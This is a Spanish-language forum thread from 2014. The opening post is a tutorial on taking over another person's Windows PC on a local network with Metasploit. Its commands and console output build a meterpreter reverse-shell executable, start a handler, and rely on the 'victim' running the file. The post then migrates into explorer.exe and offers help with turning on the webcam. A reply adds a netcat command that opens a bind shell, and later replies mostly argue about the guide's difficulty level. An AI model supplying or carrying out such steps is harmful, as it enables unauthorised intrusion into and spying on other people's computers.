Como entrar a la pc de alguien mas en una red local

Iniciado por Grillet0xEB, 17 Enero 2014, 20:29 PM

0 Miembros y 3 Visitantes están viendo este tema.

Grillet0xEB

Saludos a todos, hoy les voy a explicar como entrar a otra pc usando meterpreter.

Para esto necesitamos la herramienta BackTrack 5


1.) Abrimos una termina e iniciamos la sesión en metasploit framework y colocamos el payload que nos dará la sesión en meterpreter, nuestro ip y creamos el exploit con el nombre de click.exe,




root@bt:~# msfconsole





MMMMMMMMMMMMMMMMMMMMMMMMMMNMMMMMMMMMM
MMMMMMMMMMM                                 MMMMMMMMMMM
MMMN$                                                           vMMMMM                     
MMMNl     MMMMM                              MMMMM     JMMMM
MMMNl     MMMMMMMN                 NMMMMMMM     JMMMM
MMMNl     MMMMMMMMMNmmmMMNMMMMMMN     JMMMM
MMMNI    MMMMMMMMMMMMMMMMMMMMMMM       jMMMM
MMMNI    MMMMMMMMMMMMMMMMMMMMMMM       jMMMM
MMMNI    MMMMM       MMMMMMM       MMMMM       jMMMM
MMMNI    MMMMM       MMMMMMM       MMMMM       jMMMM
MMMNI    MMMMM       MMMMMMM       MMMMM       jMMMM 
MMMNR   #MMMM       MMMMMMM       MMMM#      dMMMM
MMMMNm ?MMNM                              MMMMN    dMMMMM
MMMMMMN  ´?MM                              MMMM   NMMMMMM
MMMMMMNe  ?NM                              MM?   jMMMMMMMM
MMMMMMMMNm,                                   eMMMMMMMMMM
MMMMMMMMMMNx                            MMMMMMMMMMMMM
MMMMMMMMMMMMMMMm+...+mMMMMMMMMMMMMMMMM


=[ metasploit v4.5.0-dev [core:4.5 api:1.0]+ -- --
=[ 927 exploits - 499 auxiliary - 151 post+ -- --
=[ 251 payloads - 28 encoders - 8 nops



msf > msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 x > /root/Desktop/clic.exe


  • exec: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 x > /root/Desktop/clic.exe
    Created by msfpayload (http://www.metasploit.com).
    Payload: windows/meterpreter/reverse_tcp
    Length: 290
    Options:
    {"LHOST"=>"192.168.1.100", "LPORT"=>"4444"}

    msf >



    2.) Luego ponemos nuestra pc a que escuche el exploit con el payload que creamos, y nuestra dirección ip



    msf > use exploit/multi/handler

    msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp

    payload => windows/meterpreter/reverse_tcp

    msf  exploit(handler) > set lhost 192.168.1.100

    lhost => 192.168.1.100

    msf  exploit(handler) >



    3.) Iniciamos el exploit y esperamos a que la victima ejecute el exploit que ya fue pasado a su pc por un pendrive o lo bajo desde un servidor local



    msf  exploit(handler) > exploit
  • Started reverse handler on 192.168.1.100:4444
  • Starting the payload handler...



    4.) Una vez la victima haya iniciando el exploit, nos cambiamos de proceso a Explorer.exe que en mi caso es el PID 1832. Para saber cual es el PID escriben "ps"



    msf  exploit(handler) > exploit
  • Started reverse handler on 192.168.1.100:4444
  • Starting the payload handler...
  • Sending stage (752128 bytes) to 192.168.1.104
  • Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.104:1171) at 2014-01-17 08:02:51 -0500

    meterpreter > migrate 1832
  • Migrating to 1832...
  • Migration completed successfully.

    meterpreter >



    5.) Ahora la pc es nuestra, escribimos "help" podemos ver todas las cosas que podemos hacer.

    si te interesa saber como encender una cámara web escríbeme un mensaje

    PD: la M de Metasploit la hice yo XD
Grillet0xEB ;)

MCKSys Argentina

Está muy lindo, pero más sencillo sería que le pases netcat a "la victima" y le digas:

Hey! Ejecuta este programa usando la siguiente línea de comandos:

nc -l -p 12345 -e cmd

Y listo. El puerto 12345 se queda a la escucha de comandos de consola y no necesitas metasploit...

Saludos!

PD: Ojo! Lo anterior es una broma :) (No te ofendas, pero: esto es hacking avanzado!?!?!)
MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."


x64core

Cita de: MCKSys Argentina en 17 Enero 2014, 20:49 PM
Está muy lindo, pero más sencillo sería que le pases netcat a "la victima" y le digas:

Hey! Ejecuta este programa usando la siguiente línea de comandos:

nc -l -p 12345 -e cmd

Y listo. El puerto 12345 se queda a la escucha de comandos de consola y no necesitas metasploit...

Saludos!

PD: Ojo! Lo anterior es una broma :) (No te ofendas, pero: esto es hacking avanzado!?!?!)

Si es así, Me gustaría mirar tu Ultimate-Uber-Haxor-Advanced-Hacking-Guide.

MCKSys Argentina

Cita de: x64Core en 18 Enero 2014, 20:26 PM
Si es así, Me gustaría mirar tu Ultimate-Uber-Haxor-Advanced-Hacking-Guide.

No existen guías así. Lo mejor del hacking, no está escrito. A estas alturas deberías saber eso...  :P

Saludos!
MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."


Cr4id3r

Chicos aunque sea algo basico, es algo, y ha aportado un poco de su tiempo para colaborar en la comunidad.
Por mi parte gracias por participar  ;)

Y si la M la hiciste tu, te quedo bien  :)
Vive solo por lo que estas dispuesto a morir.

x64core

Cita de: MCKSys Argentina en 18 Enero 2014, 20:44 PM
No existen guías así. Lo mejor del hacking, no está escrito. A estas alturas deberías saber eso...  :P

Saludos!
¿Entonces que es lo que esperas encontrar?

MCKSys Argentina

Cita de: x64Core en 18 Enero 2014, 22:38 PM
¿Entonces que es lo que esperas encontrar?

Por lógica: algo más avanzado de lo que se postea en hacking básico...

No te parece?
MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."


beholdthe

Hay que agradecer a MoonShadow este post y el tiempo que ha dedicado, eso es verdad, pero también hay que reconocer (coincido con MCKSys Argentina) que no debería estar en hacking avanzado.

.:UND3R:.

Cita de: MCKSys Argentina en 19 Enero 2014, 21:57 PM
Por lógica: algo más avanzado de lo que se postea en hacking básico...

No te parece?

Cuenta la leyenda que existen user que no toleran a personas amantes de Ing. Inversa  :laugh:

Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)

x64core

Cita de: MCKSys Argentina en 19 Enero 2014, 21:57 PM
Por lógica: algo más avanzado de lo que se postea en hacking básico...

No te parece?
Entonces esperamos mirar pronto tu guia para usuarios avanzados.

Cita de: .:UND3R:. en 20 Enero 2014, 04:04 AM
Cuenta la leyenda que existen user que no toleran a personas amantes de Ing. Inversa  :laugh:
¿Qué tiene que ver con el tema? Pero si te imaginabas eso pues no, eso es algo tan ridiculo.